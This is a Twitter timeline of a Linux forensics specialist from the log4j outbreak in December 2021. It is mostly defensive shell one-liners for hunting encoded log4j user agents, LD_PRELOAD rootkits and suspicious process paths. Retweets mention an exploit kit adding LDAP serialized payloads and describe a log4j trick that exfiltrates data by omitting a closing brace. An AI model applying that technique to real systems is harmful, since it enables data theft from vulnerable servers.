Hal Pomeranz @hal_pomeranz

I am retiring this social media account. Find me as @hal_pomeranz@infosec.exchange

 Orlando, FL
deer-run.com/~hal/
Joined November 2008
  • Tweets 19,311
  • Following 237
  • Followers 13,672
228 Photos and videos
Load newest
Anyone looking for a SOC manager role? My company is hiring. Comp package is best I’ve seen anywhere and the team is awesome. Some excellent talent to work with. DM me for details #infosecjobs #cybersecurityjobs
5
8
We have another session of @hal_pomeranz's course, "Linux Forensics," from Feb. 1-4, 2022! 10% of this course will be donated to @RuralTechFund! Check out what they do here: ruraltechfund.org/ Register for Hal's course here! : antisyphontraining.com/linux… @Antisy_Training
1
13
35
PSA - The people who are actually working the problem don't give a crap how you pronounce #log4j
5
12
2
109
Hal Pomeranz retweeted
Adrien B @Int2e_
15 Dec 2021
Don't know what an Azure Run Command is? Neither did I when we first stumbled on an attacker abusing this during a recent IR case. We wrote a short blog on these and what to look for if you're writing detections for your Azure VMs. mandiant.com/resources/azure…

Azure Run Command for Dummies | Mandiant

We highlight Azure Run Commands and provide guidance for mitigations, hunting, and detection mainly from the perspective of the virtual machines.

mandiant.com
2
76
5
194
Hal Pomeranz retweeted
Jake Williams @MalwareJake
14 Dec 2021
This is fantastic research and gives some good insight into what's going on in the phishing ecosystem.
Steve Ragan ⚠️ @SteveD3
14 Dec 2021
I promised I would write a report covering my phishing research in 2021. That report is now live: steved3.io/data/Phishing-202… Shout out to @AmandaFGoedde for helping me edit, as well as @ninoseki for making Miteru, and @urlscanio for creating an awesome tool to help defenders.
15
32
Kinsing cryptomining Linux malware has adopted #log4j to exploit new hosts. It is also bringing along a stealth rootkit to hide. In this article we go over what it is doing and how you can decloak it for incident response: sandflysecurity.com/blog/log…

Log4j Kinsing Linux Stealth Malware in the Wild

The new Log4j exploit has given cryptominer Kinsing on Linux new life. We'll show you how to detect it easily.

sandflysecurity.com
7
9
Replying to @binaryz0ne @CraigHRowland
Free Linux forensics information at archive.org/details/HalLinux…
2
4
You can also use these pipelines for other data sources. The ""cat access.log | sed 's/.*"\([^"]*\)"$/\1/'" is how I'm extracting the user agent strings from the Apache log format. Everything after that is shell idioms you can apply to any data.
1
1
Encoded #log4j user agents are longer than normal user agent strings: "cat access.log | sed 's/.*"\([^"]*\)"$/\1/' | sort -u | while read str; do len=$(echo $str | wc -c); echo -e $len\\t$str; done | sort -n" Sort unique user agent strings by length, ascending
1
1
2
Looking for #log4j encoded user agents in Apache "combined" access log format: "cat access.log | sed 's/.*"\([^"]*\)"$/\1/' | sort | uniq -c | sort -rn" Histogram of all user agents in descending order (unique encoded user agents right above your shell prompt)
1
5
5
Hal Pomeranz retweeted
Márcio Almeida @marcioalm
13 Dec 2021
Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP!
25
658
77
1,678
Hal Pomeranz retweeted
d4 @d4rckh
13 Dec 2021
Someone is angry #log4j
83
687
198
4,250
Hal Pomeranz retweeted
Paul Vixie @paulvixie
13 Dec 2021
"as long as people write parsers and connect them to the internet, i'll have work." --anon
Tom Anthony @TomAnthonySEO
13 Dec 2021
Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target...
2
19
62
#log4j has resulted in many Linux system breaches. The Linux forensics cheatsheet below can find many of the artifacts post-compromise. If you want to automate all of this, you can get a free license of @SandflySecurity on our website.
Craig Rowland - Agentless Linux Security
 @CraigHRowland
6 Feb 2019
Image version of the Linux Compromise Detection Cheatsheet for the PDF averse. #sandflysecurity #DFIR #threathunting
40
92
You want to see what LD_PRELOAD is set to? "grep -l LD_PRELOAD /proc/[0-9]*/environ | while read file; do echo $file:; cat $file | tr \\000 \\n | grep LD_PRELOAD; echo; done"
1
7
Haven't yet been seeing this with #log4j but be aware that LD_PRELOAD rootkits are circulating in the wild. Use of LD_PRELOAD is uncommon, so spot suspicious processes with "grep -l LD_PRELOAD /proc/[0-9]*/environ"
gwillem @gwillem
13 Dec 2021
Replying to @hal_pomeranz @CraigHRowland
FYI recent malware uses LD_PRELOAD to hide behind legit exe paths. sansec.io/research/nginrat
1
2
9
Replying to @d3tm4r @strandjs
The units for "-mtime" etc are in days
3
Hal Pomeranz retweeted
Ali Hadi | B!n@ry @binaryz0ne
13 Dec 2021
If you need help with Linux Forensics? Please check out my repo with lots of content at the URL below, plus check @CraigHRowland and @hal_pomeranz work too #DFIR #log4j linuxdfir.ashemery.com/ #DFIR #log4j

Linux Forensics

Everything related to Linux Forensics

linuxdfir.ashemery.com
3
37
106
Or just try: "ls -l /proc/[0-9]*/exe 2>/dev/null | awk '/ -> / {print $NF}' | sort" Shows all EXE paths in sorted order making it easier to spot outliers #log4j
5
32
Another fun Linux command line: "sudo ls -l /proc/[0-9]*/exe 2>/dev/null | awk '/ -> / && !/\/usr\/(lib(exec)?|s?bin)\// {print $9, $10, $11}' | sed 's,/proc/\([0-9]*\)/exe,\1,'" Display PIDs with non-standard EXE paths
2
54
2
284
Load more